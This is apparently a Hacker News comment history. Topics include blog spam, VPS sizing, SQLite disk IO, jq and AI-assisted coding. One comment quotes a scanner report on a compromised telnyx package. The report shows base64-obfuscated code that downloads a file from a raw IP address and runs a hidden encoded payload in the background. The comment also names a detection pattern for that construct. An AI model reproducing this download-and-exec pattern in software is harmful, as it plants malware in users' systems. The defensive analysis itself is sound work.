Hacker News | f311a's comments

This is a big problem for WordPress, but custom engines with a simple client-side check (JS-based) get close to zero spam. All those spammers use technology-fingerprinting services to obtain lists of blogs, and they look for popular blog engines only.

They inject backlinks and SEO spam to advertise payday loans, online pharmacies, casinos, and so on. Just imagine getting 30k links to your website at once; Google will rank that page very high.

One pharmacy shop selling generics, or one unlicensed casino, can make tens of thousands of dollars per day. So even one week is enough to make a lot of money.


There are zero reasons to limit yourself to 1 GB of RAM. By paying $20 instead of $5 you can get at least 8 GB of RAM. You can use it for caches or a database that supports concurrent writes. The $15 difference won't make any financial difference if you are trying to run a small business.

Thinking about how to fit everything on a $5 VPS does not help your business.


$15 is not exactly zero, is it? If you don't need more than 1GB, why pay anything for more than 1GB?

I recall running LAMP stacks on something like 128MB about 20 years ago and not really having problems with memory. Most current website backends are not really much more complicated than they were back then if you don't haul in bloat.


It is. With $10k MRR it represents 0.15% of revenue. For a company selling web apps, a whole backend that costs that much is effectively free.


You probably don't make $10k MRR on day one. If you make many small apps, it can make sense to learn how to run things lean and get 4x longer runway per app.


The runway is going to be your time and attention span, not $10/mo.

I don't know what you value your time or opportunity cost at... but the $10/mo only needs to save a few minutes of dealing with a resource constraint, or add a little reliability, to pay off.

If resource limitations end up upsetting one end user, that costs more than $10.


This assumes you have to spend any time or attention worrying. 1GB is plenty of memory for backend type stuff.

And most VPSs allow increasing memory with a click of a button and a reboot.


Overspending for the sake of overspending is not smart in life or business.


Saving 15 USD on 10k+ USD MRR is ridiculous.


Saving 15 USD on 0 USD MRR while still building the business is priceless. Virtually infinite runway.


Only if your time is worthless and someone else is paying your living expenses.


Given how much revenue depends on the experience of a web app and its loading times, I'd be happy to pay $100 a month out of that revenue if I don't have to sacrifice a second of additional loading time, no matter how cleverly I could optimize it.


That 1 second of loading time probably has more to do with heavy frontends and third-party scripts than with the backend server's capacity.

$100 is peanuts to most businesses, of course. But even so, I'd rather spend it on fixing an actual bottleneck.


Not all businesses depend on milliseconds being shaved off their loading times.

For example: Ticketmaster makes a ton of money and their site is complete dogshit.


There’s a happy medium and $5 for 1GB RAM just isn’t it.


Be sure to inform the author of the article, who is currently making money on his 1GB VPS, that he hasn't found a happy medium.


Not a very strong argument now, is it?


If the project already has positive revenue, then arguably the ability to capture new users is worth a lot, which requires acceptable performance even during a big traffic surge (like an HN hug of attention).

If the scalability is in the number of "zero cost" projects you can start, then $5 vs $15 is a 3x factor.


NVMe read latency is around 100 µs, and a SQLite database in the low terabytes needs somewhere between 3-5 random IOs per point lookup, so for an already meaningful amount of data you're talking worst case about 0.5 ms per cold lookup. Say your app is complex and makes 10 of these per request: 5 ms. That leaves you serving 200 requests/sec before ever needing any kind of cache.

That's 17 million hits per day at about 3.9 MiB/sec of sustained disk IO, before factoring in the parallelism that almost any bargain-bucket NVMe drive already offers (allowing you to at least 4x these numbers). But already you're talking about quadrupling the infrastructure spend before serving a single request, which is the entire point of the article.


You won't get such numbers on a $5 VPS; the SSDs used there are network-attached and shared between users.


Not quite $5, but a $6.71 Hetzner VPS:

    # ioping -R /dev/sda

    --- /dev/sda (block device 38.1 GiB) ioping statistics ---
    22.7 k requests completed in 2.96 s, 88.8 MiB read, 7.68 k iops, 30.0 MiB/s
    generated 22.7 k requests in 3.00 s, 88.8 MiB, 7.58 k iops, 29.6 MiB/s
    min/avg/max/mdev = 72.2 us / 130.2 us / 2.53 ms / 75.6 us


Rereading this, I have no idea where 3.9 MiB/sec came from, that 200 requests/sec would be closer to 8 MiB/sec
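Spelling out the arithmetic (a sketch assuming 100 µs reads, 5 IOs per cold lookup, 10 lookups per request, SQLite's default 4 KiB pages, and that only the leaf page of each lookup misses the page cache):

```python
io_latency = 100e-6                    # ~100 us per random NVMe read
lookup = 5 * io_latency                # 0.5 ms per cold point lookup
request = 10 * lookup                  # 5 ms for 10 lookups per request
rps = 1 / request                      # 200 requests/sec
hits_per_day = rps * 86_400            # ~17.3 million hits/day

page = 4096                            # SQLite default page size in bytes
# If interior B-tree pages stay cached and only leaf pages hit disk:
bandwidth = rps * 10 * page / 2**20    # ~7.8 MiB/s, i.e. "closer to 8"
print(round(rps), round(hits_per_day), round(bandwidth, 1))
```

Counting all 5 IOs per lookup against disk instead would put it closer to 39 MiB/s, so the exact figure depends on how warm the page cache is.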


> There are zero reasons to limit yourself to 1GB of RAM

There is a good reason: teaching yourself not to over-engineer, over-provision, or overthink, and instead to focus on generating business value for customers and getting more paying customers. I think that's what many engineers are keen to overlook in favor of fun technical details.


> There is a good reason: teaching yourself not to over-engineer, over-provision, or overthink, (...)

This is specious reasoning. You don't prevent anything by adding artificial constraints. To put things in perspective, Hetzner's cheapest vCPU plan comes with 4GB of RAM.


If I give you a box with 1 GiB of RAM, you are literally forced to either optimize your code to run in it, or accept the slowdown from paging. How is this specious?


Why not a box with 128MB of RAM then?


Aside from the perfect solution fallacy, pragmatically it's because most operating systems require more than that to run. Debian's current recommended minimum is 512 MB, though they note that with swap enabled, as little as 350 MB is possible. If you wanted to run something more esoteric like Damn Small Linux, it's possible with as little as 64 MB last I checked.

In any case, this is for the OS itself - the webserver, application, database, etc. will all of course require their own. For a well-optimized program with a well-optimized schema, 1 GB is a reasonable lower bound.


Oh I'm well aware of the existence of operating systems that run in 32MB of RAM or less. So - why not? I think a well-optimised application server (especially one that uses SQLite as a datastore like the article proposes) can fit just fine in 128MB of RAM total, or 256MB if we're being generous. A whole gigabyte of memory seems rather extravagant, no? You could run half a dozen properly optimised apps on such a box.


> If I give you a box with 1 GiB of RAM, you are literally forced to either optimize your code to run in it, or accept the slowdown from paging. How is this specious?

It is specious reasoning. Self-imposing arbitrary constraints doesn't make you write good, performant code. At most it makes your apps run slower, because they will needlessly hit your self-imposed arbitrary constraints.

If you put any value on performant code, you just write performance-oriented code regardless of your constraints. It's silly to pile on absurd constraints and expect performance to be an outcome. It's like going to the gym to work out with a hand tied behind your back and expecting this silly constraint to somehow improve the outcome of your workout. Complete nonsense.

And to drive the point home, this whole concern is even more perplexing as you are somehow targeting computational resources that fall below free tiers of some cloud providers. Sheer lunacy.


The gym analogy fails. Isolation exercises are almost exactly what you described. They target individual muscles to maximize hypertrophy, i.e. "improve the outcome of your workout."


Constraints provide feedback. Real-world example from my job: we have no real financial constraints for dev teams. If their poor schema or query design results in SLO breaches, and they opt to upsize their DB instead of spending the effort to fix the root problem, that is accepted. They have no incentive to do otherwise, because there are no constraints.

I think your analogy is flawed; a more apt one would be training with deliberately reduced oxygen levels, which trains your body to perform with fewer resources. Once you lift that constraint, you’ll perform better.

You’re correct that you can write performant code without being required to do so, but in practice, that is a rare trait.


I think we have to re-think and re-evaluate RAM usage on modern systems that use swapping with CPU-assisted page compression and fast, modern NVMe drives.

The MacBook Neo with 8 GB of RAM is a showcase of how people underestimated its capabilities pre-launch due to the low amount of RAM, yet after release reviewers pointed to a larger set of capabilities, without any of the issues people had predicted.


$5 VPS disks are nowhere near a MacBook's; they are shared between users and often network-attached. They don't sit close to the CPU.


Memory compression sounds like going back to the DOS days. I think we're better off writing tighter, more performant code with no YAGNI violations. Alas, vibe coding will probably not get us there anytime soon.


Apple laptop CPUs have hardware memory compression and exceptionally high memory bandwidth for a CPU, and with their latest devices, very high storage bandwidth for a consumer SSD, so the equation is very different from the old DOS days.


Also, macOS is generally exceptional at caching and making efficient use of the fast solid state chips.


Or better yet, go with a euro provider like Hetzner and get 8GB of RAM for $10 or so. :)

Even their $5 plan gives 4GB.


I've been using Linode for years and just yesterday went to use Hetzner for a new VPS, and they wanted my home address and passport. No thanks.


They also have servers in the US (east and west coast).


I don't think they offer their cheapest options (CX*) outside of Germany/Finland though. Singapore and USA are a bit pricier.


The reason would be YAGNI. Apparently 1GB doesn’t constitute an actual limit for OP’s use case. I’m sure he’ll upgrade if and when the need arises.


Hetzner, OVH, and others offer 4-8 GB and 2-4 cores for the same ~$5.


While I agree that the $15 difference won’t make any financial difference, I look at the numbers from another angle. The main idea here, as per my understanding, is to reduce the hosting cost as much as possible.


It doesn't look like they thought about how to make it fit, though. They just use a known-good Go template.


Where can you get 8GB for $20?


> There are zero reasons to limit yourself to 1 GB of RAM. By paying $20 instead of $5 you can get at least 8 GB of RAM.

In my head, I call this the 'doubling algorithm'.

If there's anything that's both relatively cheap and useful, but where "more" (either in quality or quantity) has additional utility, 2x it.

Then 2x it again.

Repeat until either: the price change becomes noticeable or utility stops being gained.

Tl;dr -- saving order-of single dollars is rarely worth the tradeoffs.
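The heuristic could be sketched as follows; the `price` and `utility` functions and the $25 threshold are made-up placeholders, not anything from the thread:

```python
def double_until(price, utility, noticeable):
    """Keep doubling a resource while the price stays unnoticeable
    and each doubling still adds utility."""
    size = 1
    while price(size * 2) <= noticeable and utility(size * 2) > utility(size):
        size *= 2
    return size

# Illustrative only: RAM in GB at $2.50/GB, diminishing returns past 8 GB,
# and a $25/mo point where the price change becomes noticeable.
best = double_until(lambda gb: 2.5 * gb, lambda gb: min(gb, 8), 25)
print(best)  # 8
```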


> "There are zero reasons to limit yourself to 1GB of RAM"

> Immediately proposes alternative which is literally 4x the cost.


What are you using that utilizes Apple containers?


They did not even try to hide the payload that much.

Every basic checker used by many security companies screams at `exec(base64.b64decode` when grepping code using simple regexes.

  hexora audit 4.87.1/2026-03-27-telnyx-v4.87.1.zip  --min-confidence high  --exclude HX4000

  warning[HX9000]: Potential data exfiltration with Decoded data via urllib.request.request.Request.
     ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:7786:13
       │
  7783 │         except:
  7784 │             pass
  7785 │
  7786 │         r = urllib.request.Request(_d('aHR0cDovLzgzLjE0Mi4yMDkuMjAzOjgwODAvaGFuZ3VwLndhdg=='), headers={_d('VXNlci1BZ2VudA=='): _d('TW96aWxsYS81LjA=')})
       │             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX9000
  7787 │         with urllib.request.urlopen(r, timeout=15) as d:
  7788 │             with open(t, "wb") as f:
  7789 │                 f.write(d.read())
       │
       = Confidence: High
         Help: Data exfiltration is the unauthorized transfer of data from a computer.


  warning[HX4010]: Execution of obfuscated code.
     ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:7810:9
       │
  7807 │       if os.name == 'nt':
  7808 │           return
  7809 │       try:
  7810 │ ╭         subprocess.Popen(
  7811 │ │             [sys.executable, "-c", f"import base64; exec(base64.b64decode('{_p}').decode())"],
  7812 │ │             stdout=subprocess.DEVNULL,
  7813 │ │             stderr=subprocess.DEVNULL,
  7814 │ │             start_new_session=True
  7815 │ │         )
       │ ╰─────────^ HX4010
  7816 │       except:
  7817 │           pass
  7818 │
       │
       = Confidence: VeryHigh
         Help: Obfuscated code exec can be used to bypass detection.
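The kind of naive grep-style check described above can be sketched like this (the pattern and function names are illustrative, not any particular scanner's implementation):

```python
import re

# Flag exec()/eval() applied to a base64-decoded payload, the exact
# construct the flagged package used.
SUSPICIOUS = re.compile(rb"(?:exec|eval)\s*\(\s*base64\.b64decode")

def looks_obfuscated(source: bytes) -> bool:
    """Return True if the source contains an obvious decode-and-exec."""
    return SUSPICIOUS.search(source) is not None

looks_obfuscated(b"exec(base64.b64decode('aW1wb3J0IG9z'))")  # True
looks_obfuscated(b"print('hello')")                          # False
```

An AST-based tool additionally catches variants a regex misses, e.g. when `base64.b64decode` is aliased first, which is why simple grepping is only a baseline.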


Are there more tools like hexora?


GuardDog, but it's based on regexes


jq is very convenient, even if your files are more than 100 GB. I often need to extract one field from huge JSON Lines files; I just pipe them through jq to get results. It's slower, but implementing proper data processing would take more time.
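A minimal Python equivalent of that jq pipeline, streaming one line at a time so memory stays flat regardless of file size (the field name is illustrative):

```python
import json

def extract_field(lines, field):
    """Yield one field per JSON line, like `jq -r .field` on a JSONL stream."""
    for line in lines:
        line = line.strip()
        if line:                       # skip blank lines
            yield json.loads(line).get(field)

# Works the same on an open 1 TB file object as on this toy input:
rows = ['{"id": 1, "name": "a"}', '{"id": 2, "name": "b"}']
print(list(extract_field(rows, "name")))  # ['a', 'b']
```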


More than 100 GB can be 101 GB, 500 GB, or 1 TB+. I was speaking about 1 TB+ files. I'm not sure you can get it faster unless you have a parallel processor.


Their previous release would be easily caught by static analysis. PTH is a novel technique.

Run all your new dependencies through static analysis and don't install the latest versions.

I implemented static analysis for Python that detects close to 90% of such injections.

https://github.com/rushter/hexora


Interesting tool, will definitely try it. Just curious: is there a tool (a hexora checker) that ensures hexora itself and its dependencies are not compromised? And of course, if there is one, I'll need another one for the hexora checker...


There is no such tool, but you can use other static analyzers. Datadog also has one, but it's not AST-based.



And easily bypassed by an attacker who knows about your static analysis tool and can iterate on their exploit until it no longer gets flagged.


The main things are:

1. Pin dependencies with SHA signatures.

2. Mirror your dependencies.

3. Only update when truly necessary.

4. At first, run everything in a sandbox.
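The first point can be done with pip's hash-checking mode; a sketch of the format (the package, version, and hash placeholder are illustrative — real values come from `pip hash` or `pip-compile --generate-hashes`):

```text
# requirements.txt — with --require-hashes, pip refuses to install any
# artifact whose hash doesn't match, so a tampered release fails loudly.
# Install with: pip install --require-hashes -r requirements.txt
requests==2.32.0 \
    --hash=sha256:<value printed by `pip hash requests-2.32.0-py3-none-any.whl`>
```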


They actually did not add LinkedIn specifically. It's an AI translator that accepts anything in the `to` field.

https://translate.kagi.com/?from=en&to=Crypto%20Scammer&text...


So I've seen. It's just that the LinkedIn one is what they advertised. Speaks to the fact that it's probably some slopcoded thing, which I'd usually get mildly upset about, but who can muster the effort in this economy? I think the point still stands, though.


Why is this upvoted? The author did not even bother to read what he wrote.

> SOC 2 Type II ready

Huh? You vibecoded the repo in a week and claim it's ready?


I meant that since this is designed to be deployed in a company's private VPC, their data stays with them. Zero vendor data risk. Corrected it. Thanks for pointing it out.


> I still understand how everything works,

That's partly an illusion. Try doing everything manually. After only using inline suggestions for six months a few years ago, I've noticed that my skills have gotten way worse. I became way slower. You have to constantly exercise your brain.

This reminds me of people who watch tens of video courses about programming, but can't code anything when it comes to a real job. They have an illusion of understanding how to code.

For AI companies, that's a good thing. People's skills can atrophy to the point that they can't code without LLMs.

I would suggest practicing it from time to time. It helps with code review and keeping the codebase at a decent level. We just can't afford to vibecode important software.

LLMs produce average code, and when you see it all day long, you get used to it. After getting used to it, you start to merge bad code because suddenly it looks good to you.


The GP seems to run a decentralized AI hosting company built on top of a crypto chain.

Can you get any faddier than that? Of course they love AI.


I have a hard time using languages I know without an LSP when all I've been doing is leaning on the LSP and its suggestions.

I can't imagine how it is for people who try to write code manually after years of heavy LLM usage.


I disagree. I used to do a lot of math years ago. If you gave me some problems to do now, I probably wouldn't be able to recall exactly how to solve them. But if you give me a written solution, I can still tell you with 100% confidence whether it is correct.

This is what it means to understand something. It's like P vs NP: I don't need to find the solution, I just need to be able to verify _a_ solution.


Well, I'm still using my brain from morning to evening, but I'm certainly using it differently.

This will without a doubt become a problem if the whole AI thing somehow collapses or becomes very expensive!

But it's probably the correct adaptation if it doesn't.


> That's partly an illusion. Try doing everything manually. After only using inline suggestions for six months a few years ago, I've noticed that my skills have gotten way worse. I became way slower. You have to constantly exercise your brain.

YMMV, but I'm not seeing this at all. You might get foggy around things like the particular syntax for some advanced features, but I'll never forget what a for loop is, how binary search works, or how to analyze time complexity. That's just not how human cognition works, assuming you had solid understanding before.

I still do puzzles like Advent of Code or competitive programming problems from time to time because I don't want to "lose it," but even if you're doing something interesting, a lot of practical programming boils down to the digital equivalent of "file this file into this filing cabinet": mind-numbingly boring, forgettable code that still has to be written to a reasonable standard of quality, because otherwise everything collapses.


Want to try anything more complicated? I have seen a lot of delusional people who think their skills are still at the same level, but in interviews they bomb even simple technical topics where practical implementation is concerned.

If you don't code, of course you won't be as good at coding; that's a practical fact. Sure, beyond a certain skill level your decline may not be noticeable early on, because of the years of built-up practice and knowledge.

But considering there is so much more interesting technology every year, if you don't keep improving through hands-on learning and slowing down to take stock, you won't be capable of anything more than delusional thinking about how awesome your skill level is.

